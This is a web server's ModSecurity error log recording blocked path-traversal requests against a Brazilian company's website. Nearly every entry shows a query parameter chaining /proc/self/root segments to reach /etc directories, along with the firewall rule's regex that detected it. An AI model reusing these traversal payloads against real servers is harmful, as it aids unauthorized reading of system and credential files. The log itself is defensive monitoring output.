[Thu Mar 19 04:56:21.982074 2026] [:error] [pid 19093:tid 140411683178240] [client 74.7.243.128:52892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusJV_V7PWP6ixUYl6MZgAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:57.378361 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:60056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusSQbLMZ6AikZjR9Ut9wAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:57:15.690704 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.244.43:46436] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abusW-yqAr6etmhZHNo0OgAAAE8"]
[Thu Mar 19 04:57:45.149246 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:52900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuseRkFeYa1D6dYQnC_JgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:57:46.455256 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:35350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusegkwaGbbGflqUZCGAAAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:57:47.751548 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:35364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuse-yqAr6etmhZHNo0RgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:57:51.229638 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:35380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusf8df6f5d65gmYZREIQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:57:53.643228 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:48254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusgQkwaGbbGflqUZCGCwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:57:55.108529 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:48256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusgwkwaGbbGflqUZCGDQAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:57:57.522413 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.243.128:48268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abushQbLMZ6AikZjR9UuMQAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:57:58.868939 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:48282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abushta6ubjKNq_cu4YSuAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:58:02.499040 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:46432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusisdf6f5d65gmYZREJQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:58:03.868368 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:46440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusi-oXxyEfFpUF8f_hbQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:58:09.411524 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:46452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuskPu8EFLIOrSqIptvDgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:58:15.259456 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:51682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusl8df6f5d65gmYZRELAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:58:17.736017 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:51694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusmV_V7PWP6ixUYl6MpAAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:58:20.273453 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:51702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusnMdf6f5d65gmYZREMwAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:58:22.819603 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:56536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusngbLMZ6AikZjR9UuOwAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:58:26.371013 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:56540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusouoXxyEfFpUF8f_heQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:58:37.379014 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:56544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusrQkwaGbbGflqUZCGSwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:58:41.075546 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:54886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abussV_V7PWP6ixUYl6MrgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:58:46.783456 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:55758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abustsdf6f5d65gmYZREOgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
